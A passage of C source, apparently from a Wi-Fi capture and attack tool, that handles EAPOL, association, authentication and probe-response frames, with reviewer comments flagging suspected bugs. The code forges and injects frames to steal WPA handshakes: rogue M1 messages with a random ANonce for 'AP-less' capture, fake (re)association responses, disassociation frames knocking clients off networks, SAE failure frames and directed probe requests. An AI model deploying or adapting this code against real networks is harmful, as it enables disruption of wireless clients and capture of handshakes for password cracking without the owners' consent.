				if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT %d]\n", calceapoltimeout); }
				}
			}
		/* the M2 state is consumed whether or not it matched */
		memset(&laststam2, 0, 6); memset(&lastapm2, 0, 6); lastrcm2 = 0; lasttimestampm2 = 0;
		return;
		}
	if(keyinfo == 2)
		{
		calceapoltimeout = timestamp -lasttimestampm1;
		/* M2 answering the recorded rcrandom M1 (same sta/ap pair) */
		if((rc == rcrandom) && (memcmp(&laststam1, macfrx->addr2, 6) == 0) && (memcmp(&lastapm1, macfrx->addr1, 6) == 0))
			{
			if(fd_pcapng != 0) { writeepbm2(fd_pcapng); }
			if(addpownedstaap(macfrx->addr2, macfrx->addr1, RX_M12) == false)
				{
				if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT %d]\n", calceapoltimeout); }
				}
			return;
			}
		/* otherwise remember this M2 so a following M3 can be paired with it */
		if(fd_pcapng != 0) { writeepb(fd_pcapng); }
		memcpy(&laststam2, macfrx->addr2, 6); memcpy(&lastapm2, macfrx->addr1, 6); lastrcm2 = rc; lasttimestampm2 = timestamp;
		return;
		}
	if(keyinfo == 4)
		{
		if(fd_pcapng != 0) { writeepb(fd_pcapng); }
		/* nothing recorded yet for this pair and disassociation not disabled:
		 * the tool transmits a disassociation (reason AP_BUSY) */
		if(checkpownedstaap(macfrx->addr2, macfrx->addr1) == false)
			{
			if(disassociationflag == false) { send_disassociation(macfrx->addr2, macfrx->addr1, WLAN_REASON_DISASSOC_AP_BUSY); }
			}
		memset(&laststam2, 0, 6); memset(&lastapm2, 0, 6); lastrcm2 = 0; lasttimestampm2 = 0;
		return;
		}
	else
		{
		/* unknown key-info class: keep the frame, no state change */
		if(fd_pcapng != 0) { writeepb(fd_pcapng); }
		}
	return;
	}
if(eapauth->type == EAP_PACKET)
	{
	/* NOTE(review): writeepb() is invoked twice in a row here, so EAP packets
	 * appear to be written to the pcapng file twice -- confirm intent */
	if(fd_pcapng != 0) { writeepb(fd_pcapng); }
	if(fd_pcapng != 0) { writeepb(fd_pcapng); }
	exteap = (exteap_t*)(eapauthptr +EAPAUTH_SIZE);
	exteaplen = ntohs(exteap->extlen);
	/* NOTE(review): `exteaplen -= 5` inside the condition is an assignment, not
	 * a comparison; on a length mismatch it silently changes exteaplen and only
	 * returns when the result is non-zero, so a 5-byte EAP header with no data
	 * can still reach exteap->data[0] below -- looks like a typo, confirm */
	if((eapauthlen != exteaplen +4) && (exteaplen -= 5)) { return; }
	if(exteap->exttype == EAP_TYPE_ID)
		{
		/* identity request/response: print the identity (exteaplen minus the
		 * 5-byte EAP header) when the status flag asks for it */
		if((exteap->code == EAP_CODE_REQ) && (exteap->data[0] != 0))
			{
			if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); printid(exteaplen -5, exteap->data); fprintf(stdout, " [EAP REQUEST ID, SEQUENCE %d]\n", macfrx->sequence >> 4); }
			}
		if((exteap->code == EAP_CODE_RESP) && (exteap->data[0] != 0))
			{
			if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); printid(exteaplen -5, exteap->data); fprintf(stdout, " [EAP RESPONSE ID, SEQUENCE %d]\n", macfrx->sequence >> 4); }
			}
		}
	return;
	}
if(eapauth->type == EAPOL_START)
	{
	if(fd_pcapng != 0) { writeepb(fd_pcapng); }
	/* unless client attacks are disabled, answer with an identity request */
	if(attackclientflag == false) { send_requestidentity(macfrx->addr2, macfrx->addr1); }
	return;
	}
/* remaining EAPOL types are only recorded */
if(eapauth->type == EAPOL_LOGOFF) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; }
if(eapauth->type == EAPOL_ASF) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; }
if(eapauth->type == EAPOL_MKA) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; }
/* unknown EAPOL types are recorded as well */
if(fd_pcapng != 0) { writeepb(fd_pcapng); }
return;
}
/*===========================================================================*/
/*===========================================================================*/
/*
 * Transmit an EAPOL-Key M1 from macap to macsta (body continues past this
 * block). anoncewpa2data is a prebuilt 802.11 data header + LLC/SNAP +
 * EAPOL-Key prefix; the replay counter and ANonce are patched in afterwards.
 */
static void send_m1(uint8_t *macsta, uint8_t *macap)
{
static mac_t *macftx;
static const uint8_t anoncewpa2data[] = { 0x88, 0x02, 0x3a, 0x01, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x00, 0x00, 0x06, 0x00, 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, 0x02, 0x03, 0x00, 0x5f, 0x02, 0x00, 0x8a, 0x00, 0x10, };
#define ANONCEWPA2_SIZE sizeof(anoncewpa2data)
static uint8_t packetout[1024];
/* filter list: mode 1 skips listed stations, mode 2 skips unlisted ones */
if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; }
if((filtermode == 2) &&
(checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) >= 3) { return; } memset(&packetout, 0, HDRRT_SIZE +140); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); memcpy(&packetout[HDRRT_SIZE], &anoncewpa2data, ANONCEWPA2_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); packetout[HDRRT_SIZE +ANONCEWPA2_SIZE +7] = rcrandom &0xff; packetout[HDRRT_SIZE +ANONCEWPA2_SIZE +6] = (rcrandom >> 8) &0xff; memcpy(&packetout[HDRRT_SIZE +ANONCEWPA2_SIZE +8], &anoncerandom, 32); if(write(fd_socket, packetout, HDRRT_SIZE +133) < 0) { perror("\nfailed to transmit M1"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); macftx->retry = 1; if(write(fd_socket, packetout, HDRRT_SIZE +133) < 0) { perror("\nfailed to retransmit M1"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } /*===========================================================================*/ static inline void process80211reassociation_resp() { if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { return; } send_m1(macfrx->addr1, macfrx->addr2); if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [REASSOCIATIONRESPONSE, SEQUENCE %d]\n", macfrx->sequence >> 4); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } /*===========================================================================*/ static void send_reassociationresponse(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t associationresponsedata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, 0x18, 0x24, 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xaf, 0x01, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x0d, 0x0f, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x0e, 0x14, 0x00, 0x0a, 0x00, 0x2c, 0x01, 0xc8, 0x00, 0x14, 0x00, 0x05, 0x00, 0x19, 0x00, 0x7f, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00 }; #define ASSOCIATIONRESPONSE_SIZE sizeof(associationresponsedata) static const uint8_t associationid[] = { 0x31, 0x04, 0x00, 0x00, 0x00, 0xc0 }; #define ASSOCIATIONID_SIZE sizeof(associationid) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) > RX_PMKID) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_RESP; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myassociationresponsesequence++ << 4; if(myassociationresponsesequence >= 4096) { myassociationresponsesequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &associationid, ASSOCIATIONID_SIZE); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE], &associationresponsedata, ASSOCIATIONRESPONSE_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE) < 0) { perror("\nfailed to transmit reassociationresponse"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } /*===========================================================================*/ static inline void process80211reassociation_req() { static uint8_t *essidtag_ptr; static ietag_t *essidtag; static uint8_t 
*reassociationrequest_ptr; static int reassociationrequestlen; if(attackclientflag == false) { send_reassociationresponse(macfrx->addr2, macfrx->addr1); usleep(M1WAITTIME); send_m1(macfrx->addr2, macfrx->addr1); } if(payload_len < (int)CAPABILITIESSTA_SIZE) { return; } reassociationrequest_ptr = payload_ptr +CAPABILITIESREQSTA_SIZE; reassociationrequestlen = payload_len -CAPABILITIESREQSTA_SIZE; if(reassociationrequestlen < (int)IETAG_SIZE) { return; } essidtag_ptr = gettag(TAG_SSID, reassociationrequest_ptr, reassociationrequestlen); if(essidtag_ptr == NULL) { return; } essidtag = (ietag_t*)essidtag_ptr; if(essidtag->len > ESSID_LEN_MAX) { return; } if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); // printessid(essidtag_ptr); fprintf(stdout, " [REASSOCIATIONREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } return; } /*===========================================================================*/ static void send_associationresponse(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t associationresponsedata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, 0x18, 0x24, 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xaf, 0x01, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x0d, 0x0f, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x0e, 0x14, 0x00, 0x0a, 0x00, 0x2c, 0x01, 0xc8, 0x00, 0x14, 0x00, 0x05, 0x00, 0x19, 0x00, 0x7f, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00 }; #define ASSOCIATIONRESPONSE_SIZE 
sizeof(associationresponsedata) static const uint8_t associationid[] = { 0x31, 0x04, 0x00, 0x00, 0x00, 0xc0 }; #define ASSOCIATIONID_SIZE sizeof(associationid) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) > RX_M1) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_RESP; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myassociationresponsesequence++ << 4; if(myassociationresponsesequence >= 4096) { myassociationresponsesequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &associationid, ASSOCIATIONID_SIZE); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE], &associationresponsedata, ASSOCIATIONRESPONSE_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE) < 0) { perror("\nfailed to transmit associationresponse"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } /*===========================================================================*/ static inline void process80211association_resp() { if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { return; } send_m1(macfrx->addr1, macfrx->addr2); if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [ASSOCIATIONRESPONSE, SEQUENCE %d]\n", macfrx->sequence >> 4); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } /*===========================================================================*/ static inline void send_associationrequest(uint8_t *macap) { static int c; static 
mac_t *macftx; static aplist_t *zeiger; static const uint8_t associationrequestcapa[] = { 0x31, 0x04, 0x0a, 0x00 }; #define ASSOCIATIONREQUESTCAPA_SIZE sizeof(associationrequestcapa) static const uint8_t associationrequestdata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0x21, 0x02, 0x08, 0x14, 0x24, 0x02, 0x01, 0x0d, 0x2d, 0x1a, 0xad, 0x49, 0x17, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7f, 0x08, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x1e, 0x00, 0x90, 0x4c, 0x33, 0xad, 0x49, 0x17, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdd, 0x07, 0x00, 0x50, 0xf2, 0x02, 0x00, 0x01, 0x00, }; #define ASSOCIATIONREQUEST_SIZE sizeof(associationrequestdata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } if(checkpownedstaap(mac_mysta, macap) > 0) { return; } zeiger = aplist; for(c = 0; c < APLIST_MAX -1; c++) { if(zeiger->timestamp == 0) { return; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +ASSOCIATIONREQUEST_SIZE +ESSID_LEN_MAX +RSN_LEN_MAX +6); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_REQ; memcpy(macftx->addr1, macap, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myassociationrequestsequence++ << 4; if(myassociationrequestsequence >= 4096) { myassociationrequestsequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &associationrequestcapa, ASSOCIATIONREQUESTCAPA_SIZE); packetout[HDRRT_SIZE 
+MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +1] = zeiger->essid_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +2], zeiger->essid, zeiger->essid_len); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2], &associationrequestdata, ASSOCIATIONREQUEST_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE] = TAG_RSN; packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE +1] = zeiger->rsn_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE +1 +1], zeiger->rsn, zeiger->rsn_len); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE +1 +1 +zeiger->rsn_len) < 0) { perror("\nfailed to transmit associationrequest"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } zeiger++; } return; } /*===========================================================================*/ static inline void process80211association_req() { static uint8_t *essidtagptr; static ietag_t *essidtag; static uint8_t *associationrequestptr; static int associationrequestlen; if(attackclientflag == false) { send_associationresponse(macfrx->addr2, macfrx->addr1); usleep(M1WAITTIME); send_m1(macfrx->addr2, macfrx->addr1); } if(payload_len < (int)CAPABILITIESSTA_SIZE) { return; } associationrequestptr = payload_ptr +CAPABILITIESSTA_SIZE; associationrequestlen = payload_len -CAPABILITIESSTA_SIZE; if(associationrequestlen < (int)IETAG_SIZE) { return; } essidtagptr = gettag(TAG_SSID, associationrequestptr, associationrequestlen); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if(essidtag->len > ESSID_LEN_MAX) { return; } if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } 
if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(essidtag->len, essidtag->data); fprintf(stdout, " [ASSOCIATIONREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } return; } /*===========================================================================*/ static inline void process80211authentication() { static authf_t *auth; auth = (authf_t*)payload_ptr; if(payload_len < (int)AUTHENTICATIONFRAME_SIZE) { return; } if(macfrx->protected == 1) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SHARED KEY ENCRYPTED KEY INSIDE], STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == OPEN_SYSTEM) { if(attackapflag == false) { if(memcmp(macfrx->addr1, &mac_mysta, 6) == 0) { send_associationrequest(macfrx->addr2); } } if(attackclientflag == false) { if(auth->authentication_seq == 1) { if(memcmp(macfrx->addr2, &mac_mysta, 6) != 0) { send_authenticationresponseopensystem(macfrx->addr2, macfrx->addr1); } } } if(fd_pcapng != 0) { if(payload_len > 6) { if(memcmp(macfrx->addr2, &mac_mysta, 6) != 0) { writeepb(fd_pcapng); } } } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, OPEN SYSTEM, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == SAE) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { if(auth->authentication_seq == 1) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SAE COMMIT, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } else if(auth->authentication_seq == 2) { if(memcmp(macfrx->addr1, macfrx->addr3, 6) == 0) { send_saefailure(macfrx->addr2, macfrx->addr1, 
macfrx->sequence >> 4); } printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SAE CONFIRM, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } } else if(auth->authentication_algho == SHARED_KEY) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SHARED KEY, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FBT) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FAST TRANSITION, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FILS) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FILS, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FILSPFS) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FILS PFS, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FILSPK) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FILS PK, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == NETWORKEAP) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, NETWORK EAP, STATUS %d, SEQUENCE %d]\n", auth->statuscode, 
macfrx->sequence >> 4);
		}
	}
else
	{
	/* unrecognised authentication algorithm: record only */
	if(fd_pcapng != 0) { writeepb(fd_pcapng); }
	}
return;
}
/*===========================================================================*/
/*
 * Handle a received probe response (macfrx, payload_ptr, payload_len and
 * timestamp are the globals describing the current frame).
 *
 * Known AP (addr2 already in aplist): refresh its timestamp, fill in the ESSID
 * if the stored one is still empty, set status=1 when the response was
 * addressed to our own station, otherwise -- every apattacksintervall-th
 * response for at most apattacksmax rounds, and only while attackapflag is
 * unset -- send a directed probe request and bump the counter.
 *
 * Unknown AP: take the first free slot; if aplist_ptr has run off the end of
 * the list, qsort() it with sort_aplist_by_time and reuse from slot 0. The
 * slot is zeroed and filled with addr, channel (current scan channel unless a
 * channel tag is present), ESSID and RSN from the frame; the frame is written
 * to the pcapng file and printed when STATUS_PROBES is enabled.
 *
 * All locals are static, so essidtag/channeltag/rsntag keep the value of the
 * last frame in which the tag was found.
 */
static inline void process80211probe_resp()
{
static aplist_t *zeiger;
static uint8_t *apinfoptr;
static int apinfolen;
static uint8_t *essidtagptr;
static ietag_t *essidtag = NULL;
static uint8_t *channeltagptr;
static ietag_t *channeltag = NULL;
static uint8_t *rsntagptr;
static ietag_t *rsntag = NULL;
/* fixed capability header first, then at least one information element */
if(payload_len < (int)CAPABILITIESAP_SIZE) { return; }
apinfoptr = payload_ptr +CAPABILITIESAP_SIZE;
apinfolen = payload_len -CAPABILITIESAP_SIZE;
if(apinfolen < (int)IETAG_SIZE) { return; }
for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++)
	{
	/* first empty slot: remember it for a new entry below */
	if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; }
	if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0)
		{
		zeiger->timestamp = timestamp;
		/* ESSID still unknown (e.g. hidden earlier): try to learn it now */
		if((zeiger->essid_len == 0) || (zeiger->essid[0] == 0))
			{
			essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen);
			if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { zeiger->essid_len = essidtag->len; memcpy(zeiger->essid, essidtag->data, essidtag->len); } }
			}
		/* response to our own station: the AP answers us, nothing more to do */
		if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { zeiger->status = 1; return; }
		if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall)))
			{
			if(attackapflag == false) { send_directed_proberequest(macfrx->addr2, zeiger->essid_len, zeiger->essid); zeiger->status = 0; }
			}
		zeiger->count++;
		return;
		}
	}
/* no free slot found: aplist_ptr still points past the end from the previous
 * call, so recycle the list */
if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; }
memset(aplist_ptr, 0, APLIST_SIZE);
aplist_ptr->timestamp = timestamp;
if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; }
memcpy(aplist_ptr->addr, macfrx->addr2, 6);
/* default to the channel currently being scanned; a channel tag overrides it
 * (NOTE(review): data[0] is read without checking the tag length -- relies on
 * gettag() guaranteeing at least one data byte, confirm) */
aplist_ptr->channel = channelscanlist[cpa];
channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen);
if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; }
essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen);
if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } }
/* RSN IE is kept only when it is at least 20 bytes and fits the slot */
rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen);
if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } }
/* NOTE(review): essidtag is only assigned when an SSID tag was found, so a
 * probe response without one reaches the call below with essidtag NULL (first
 * such frame) or pointing into an earlier frame (static local). The already
 * validated aplist_ptr->essid_len / aplist_ptr->essid look like the intended
 * arguments -- confirm */
if(attackapflag == false) { if(memcmp(&mac_mysta, macfrx->addr1, 6) != 0) { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } aplist_ptr->count = 1; }
if(fd_pcapng != 0) { writeepb(fd_pcapng); }
if((statusout & STATUS_PROBES) == STATUS_PROBES) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(aplist_ptr->essid_len, aplist_ptr->essid); fprintf(stdout, " [PROBERESPONSE, SEQUENCE %d, AP CHANNEL %d]\n", macfrx->sequence >> 4, aplist_ptr->channel); }
/* advance to the next slot for the following new AP */
aplist_ptr++;
return;
}
/*===========================================================================*/
/*
 * Transmit a probe response from macap to macsta announcing essid/essid_len
 * (body continues past this block). proberesponsedata is the fixed tail of
 * information elements appended after the SSID element.
 */
static inline void send_proberesponse(uint8_t *macsta, uint8_t *macap, uint8_t essid_len, uint8_t *essid)
{
static mac_t *macftx;
static capap_t *capap;
